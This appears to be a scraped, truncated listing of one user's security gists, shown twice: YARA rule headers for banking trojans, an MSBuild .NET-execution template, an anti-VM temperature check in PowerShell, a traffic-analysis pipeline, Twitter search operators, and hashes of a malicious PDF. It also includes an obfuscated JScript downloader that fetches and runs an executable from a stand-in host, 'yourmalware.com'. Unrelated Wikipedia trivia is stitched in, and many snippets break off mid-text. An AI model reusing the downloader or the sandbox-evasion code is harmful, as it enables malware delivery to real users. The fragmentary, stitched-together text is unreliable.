teixeira0xfffff

## 09328irpf_restiruir_.msi
/*
   YARA Rule Set
   Author: Ialle Teixeira
   Date: 2019-05-18
   Identifier: MSI banking trojan
*/

rule sig_09328irpf_restiruir_ {
   meta:
      description = "reported by @DefesaDigital - file 09328irpf_restiruir_.msi"

## Dil_Peticao_99845650.lnk
/*
   YARA Rule Set
   Author: Ialle Teixeira
   Date: 2019-05-18
   Identifier: .LNK banking trojan
*/

rule Dil_Peticao_99845650 {
   meta:
      description = "reported by @DefesaDigital - file Dil_Peticao_99845650.lnk"

## gist:c5333504841978a359c540f837ab0a18
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" >
	<Target Name="Hello" >

	<!-- Call ANY .NET API -->
	<!--

		Author: Casey Smith, Twitter: @subTee

		License: BSD 3-Clause


## resources.bin
   ++++++ Basic knowledge requirements for cybersecurity and hacking ++++++
These are the basic competencies expected (and tested for during the 1st in person interview) by a large, very visible InfoSec company I think it is a good base competency list for anyone looking to get into an Infosec career (with specialization plus and some programming /scripting ability) or learn cybersecurity/hacking as a hobby:

Networking: Good understanding of OSI layer model / Understating of communication flow through each layer / Good understanding of functions of each layer / Understanding of major protocols in each layer / In-depth understanding Layer 3 & Layer 4 protocols  IP, ICMP Protocols (layer 3) TCP, UDP Protocols (layer 4)

Overview of TCP/IP Layer model: ARP / Understanding of Client & Server communication model / Ports common services run on / Ephemeral port vs Well known ports

Understanding of major (everyday Layer 7) services/protocols: DNS o DHCP o HTTP HTTP Header Fields HTTP Status Codes  How HTTP mainta

## MSAcpi_ThermalZoneTemperature.ps1
function Get-AntiVMwithTemperature {
    $t = Get-WmiObject MSAcpi_ThermalZoneTemperature -Namespace "root/wmi"

    $valorTempKelvin = $t.CurrentTemperature / 10
    $valorTempCelsius = $valorTempKelvin - 273.15

    $valorTempFahrenheit = (9/5) * $valorTempCelsius + 32

    return $valorTempCelsius.ToString() + " C : " + $valorTempFahrenheit.ToString() + " F : " + $valorTempKelvin + "K"
}

## gist:2ed9152acea792be7dffbf0aa0191b29
~ apt install tcpdump
~ apt install argus-client


 ~tcpdump -nn -s0 -rYourdump.pcap -w - |argus -r - -AZJmR -w - |ra -n -Zb -L10 -r - -s +dur +synack +ackdat +swin +dwin +rate +ĺoad +tcprtt +loss +runtime +retrans +sgap +dgap - tcp |xargs -d$'\n' -L1 sh -c 'date "+%d.%m.%Y %T $0"'


## twitterOSINT
▪️ containing both “watching” and “now”. This is the default operator **watching now**

▪️ containing the exact phrase “happy hour”: **“happy hour”**

▪️ containing either “love” or “hate” (or both): **love OR hate**

▪️ containing “beer” but not “root”: **beer -root**

▪️ containing the hashtag **“haiku”**

## gist:6ccbdbef95da08dcf2e213b99e4b9533
Name: SCAN_0502_FA2C8.pdf
MD5	dfc20138456eb478673e046754536c76
SHA-1	bbc5dbdf9bbf844854dc52f47b03b88ebac5bc17
SHA-256	a6b7a89a073be96dcfaac63ef0093e3186171995df90c9c3f966083338e858e9
Vhash	913a9ca88f467c85a8c6e005b9321caa5
SSDEEP	384:fC3s7nDeeTykyBmtnbFOB444uBAzLzobLTbL4wu:fC3sO+AAxOBhfAzAbPb8wu
File type	PDF
Magic	PDF document, version 1.4
File size	16.93 KB (17337 bytes)
https://www.virustotal.com/gui/file/a6b7a89a073be96dcfaac63ef0093e3186171995df90c9c3f966083338e858e9/details

## js
/***************************************************************************/
/*                                                                         */
/*  This obfuscated code was created by Javascript Obfuscator Free Version.*/
/*  Javascript Obfuscator Free Version can be downloaded here              */
/*  http://javascriptobfuscator.com                                        */
/*                                                                         */
/***************************************************************************/
var _$_850e = ["http://yourmalware.com/dm.exe", "WScript.Shell", "CreateObject", "Scripting.FileSystemObject", "GetSpecialFolder", "\\0Whst.exe", "MSXML2.XMLHTTP", "GET", "open", "send", "Status", "FileExists", "DeleteFile", "ADODB.Stream", "Open", "Type", "ResponseBody", "Write", "Position", "SaveToFile", "Close", "Run"];
var url = _$_850e[0];
var WshShell = WScript[_$_850e[2]](_$_850e[1]);

## js
'... that the Ludington family included a teenage girl (statue pictured) whose night-long ride to alert the Continental Army of an imminent British attack has been compared to the ride of Paul Revere?... that actress Siobhan Finneran said she wanted her Downton Abbey character "flung off the roof of the Abbey?'
'... that red-headed pine sawfly larvae drag pine needles into the silken tubes in which they live?'
'... that theoretical physicist Deepak Dhar and Ramakrishna Ramaswamy solved the Abelian sandpile model of self-organized criticality with their Dhar-Ramaswamy model?'
'... that Seattles passenger-only ferries, blamed for beach erosion, were forced to slow down because of a class-action lawsuit?'
'... that Juana Bordas says her parents were uncomfortable with the idea of her leaving home to go to college due to the "crab syndrome"?'
'... that the Soviet Armys 7th Guards Tank Division was part of the Group of Soviet Forces in Germany for 43 years during the Cold War?'
'... that the call letters of radio
	/*
	YARA Rule Set
	Author: Ialle Teixeira
	Date: 2019-05-18
	Identifier: MSI banking trojan
	*/

	rule sig_09328irpf_restiruir_ {
	meta:
	description = "reported by @DefesaDigital - file 09328irpf_restiruir_.msi"
	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" >
	<Target Name="Hello" >

	<!-- Call ANY .NET API -->
	<!--

	Author: Casey Smith, Twitter: @subTee

	License: BSD 3-Clause
	++++++ Basic knowledge requirements for cybersecurity and hacking ++++++
	These are the basic competencies expected (and tested for during the 1st in person interview) by a large, very visible InfoSec company I think it is a good base competency list for anyone looking to get into an Infosec career (with specialization plus and some programming /scripting ability) or learn cybersecurity/hacking as a hobby:

	Networking: Good understanding of OSI layer model / Understating of communication flow through each layer / Good understanding of functions of each layer / Understanding of major protocols in each layer / In-depth understanding Layer 3 & Layer 4 protocols  IP, ICMP Protocols (layer 3) TCP, UDP Protocols (layer 4)

	Overview of TCP/IP Layer model: ARP / Understanding of Client & Server communication model / Ports common services run on / Ephemeral port vs Well known ports

	Understanding of major (everyday Layer 7) services/protocols: DNS o DHCP o HTTP HTTP Header Fields HTTP Status Codes  How HTTP mainta
	function Get-AntiVMwithTemperature {
	$t = Get-WmiObject MSAcpi_ThermalZoneTemperature -Namespace "root/wmi"

	$valorTempKelvin = $t.CurrentTemperature / 10
	$valorTempCelsius = $valorTempKelvin - 273.15

	$valorTempFahrenheit = (9/5) * $valorTempCelsius + 32

	return $valorTempCelsius.ToString() + " C : " + $valorTempFahrenheit.ToString() + " F : " + $valorTempKelvin + "K"
	}
	~ apt install tcpdump
	~ apt install argus-client


	~tcpdump -nn -s0 -rYourdump.pcap -w - \|argus -r - -AZJmR -w - \|ra -n -Zb -L10 -r - -s +dur +synack +ackdat +swin +dwin +rate +ĺoad +tcprtt +loss +runtime +retrans +sgap +dgap - tcp \|xargs -d$'\n' -L1 sh -c 'date "+%d.%m.%Y %T $0"'
	▪️ containing both “watching” and “now”. This is the default operator watching now

	▪️ containing the exact phrase “happy hour”: “happy hour”

	▪️ containing either “love” or “hate” (or both): love OR hate

	▪️ containing “beer” but not “root”: beer -root

	▪️ containing the hashtag “haiku”
	Name: SCAN_0502_FA2C8.pdf
	MD5 dfc20138456eb478673e046754536c76
	SHA-1 bbc5dbdf9bbf844854dc52f47b03b88ebac5bc17
	SHA-256 a6b7a89a073be96dcfaac63ef0093e3186171995df90c9c3f966083338e858e9
	Vhash 913a9ca88f467c85a8c6e005b9321caa5
	SSDEEP 384:fC3s7nDeeTykyBmtnbFOB444uBAzLzobLTbL4wu:fC3sO+AAxOBhfAzAbPb8wu
	File type PDF
	Magic PDF document, version 1.4
	File size 16.93 KB (17337 bytes)
	https://www.virustotal.com/gui/file/a6b7a89a073be96dcfaac63ef0093e3186171995df90c9c3f966083338e858e9/details
	/***************************************************************************/
	/* */
	/* This obfuscated code was created by Javascript Obfuscator Free Version.*/
	/* Javascript Obfuscator Free Version can be downloaded here */
	/* http://javascriptobfuscator.com */
	/* */
	/***************************************************************************/
	var _$_850e = ["http://yourmalware.com/dm.exe", "WScript.Shell", "CreateObject", "Scripting.FileSystemObject", "GetSpecialFolder", "\\0Whst.exe", "MSXML2.XMLHTTP", "GET", "open", "send", "Status", "FileExists", "DeleteFile", "ADODB.Stream", "Open", "Type", "ResponseBody", "Write", "Position", "SaveToFile", "Close", "Run"];
	var url = _$_850e[0];
	var WshShell = WScript[_$_850e[2]](_$_850e[1]);
	'... that the Ludington family included a teenage girl (statue pictured) whose night-long ride to alert the Continental Army of an imminent British attack has been compared to the ride of Paul Revere?... that actress Siobhan Finneran said she wanted her Downton Abbey character "flung off the roof of the Abbey?'
	'... that red-headed pine sawfly larvae drag pine needles into the silken tubes in which they live?'
	'... that theoretical physicist Deepak Dhar and Ramakrishna Ramaswamy solved the Abelian sandpile model of self-organized criticality with their Dhar-Ramaswamy model?'
	'... that Seattles passenger-only ferries, blamed for beach erosion, were forced to slow down because of a class-action lawsuit?'
	'... that Juana Bordas says her parents were uncomfortable with the idea of her leaving home to go to college due to the "crab syndrome"?'
	'... that the Soviet Armys 7th Guards Tank Division was part of the Group of Soviet Forces in Germany for 43 years during the Cold War?'
	'... that the call letters of radio